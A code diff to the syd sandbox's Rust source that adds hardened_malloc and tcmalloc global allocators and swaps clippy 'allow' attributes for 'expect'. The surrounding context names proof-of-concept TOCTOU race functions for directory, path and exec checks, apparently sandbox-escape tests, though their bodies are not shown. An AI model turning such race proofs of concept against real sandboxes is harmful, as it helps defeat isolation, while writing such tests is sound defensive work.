@@ -35,6 +35,21 @@ use syd::{
     path::XPathBuf,
 };
 
+// Set global allocator to GrapheneOS allocator.
+#[cfg(all(
+    not(coverage),
+    not(feature = "prof"),
+    target_page_size_4k,
+    target_pointer_width = "64"
+))]
+#[global_allocator]
+static GLOBAL: hardened_malloc::HardenedMalloc = hardened_malloc::HardenedMalloc;
+
+// Set global allocator to tcmalloc if profiling is enabled.
+#[cfg(feature = "prof")]
+#[global_allocator]
+static GLOBAL: tcmalloc::TCMalloc = tcmalloc::TCMalloc;
+
 syd::main! {
     use lexopt::prelude::*;
 
@@ -445,7 +460,7 @@ struct Data {
     src: CString,
 }
 
-#[allow(clippy::disallowed_methods)]
+#[expect(clippy::disallowed_methods)]
 fn toctou_cd_poc(benign_dir: &str, target_dir: &str) -> bool {
     // STEP 1: SETUP
     // Prepare the benign path /var/empty to change directory to.
@@ -502,7 +517,7 @@ fn toctou_cd_poc(benign_dir: &str, target_dir: &str) -> bool {
     false
 }
 
-#[allow(clippy::disallowed_methods)]
+#[expect(clippy::disallowed_methods)]
 fn toctou_path_poc(pid: Pid, benign_file: &str, target_file: &str) -> Option<OwnedFd> {
     // STEP 1: SETUP
     let benign_path = CString::new(benign_file).unwrap();
@@ -596,7 +611,7 @@ fn strace_chdir(dir: &str) -> bool {
     }
 }
 
-#[allow(clippy::disallowed_methods)]
+#[expect(clippy::disallowed_methods)]
 fn toctou_exec_poc(benign_executable: &str, argv: &[OsString]) -> bool {
     // STEP 1: SETUP
     let benign_path = CString::new(benign_executable).unwrap();
@@ -654,7 +669,7 @@ fn toctou_exec_poc(benign_executable: &str, argv: &[OsString]) -> bool {
     false
 }
 
-#[allow(clippy::disallowed_methods)]
+#[expect(clippy::disallowed_methods)]
 fn strace_chdir_reexec() -> std::io::Error {
     let exe = current_exe().expect("current exe");
     let arg: Vec<OsString> = args_os().skip(1).collect();
@@ -697,7 +712,7 @@ fn strace_path() -> bool {
     }
 }
 
-#[allow(clippy::disallowed_methods)]
+#[expect(clippy::disallowed_methods)]
 fn strace_path_reexec() -> std::io::Error {
     let exe = current_exe().expect("current exe");
     let arg: Vec<OsString> = args_os().skip(1).collect();
@@ -738,7 +753,7 @@ fn strace_exec() -> bool {
     }
 }
 
-#[allow(clippy::disallowed_methods)]
+#[expect(clippy::disallowed_methods)]
 fn strace_exec_reexec() -> std::io::Error {
     let exe = current_exe().expect("current exe");
     let arg: Vec<OsString> = args_os().skip(1).collect();
@@ -754,7 +769,7 @@ fn strace_exec_reexec() -> std::io::Error {
     cmd.exec()
 }
 
-#[allow(clippy::disallowed_methods)]
+#[expect(clippy::disallowed_methods)]
 fn create_random_script() -> Result<String, Errno> {
     // Generate a random file name using nix::libc::getrandom
     let mut buf: [u8; 8] = [0; 8];
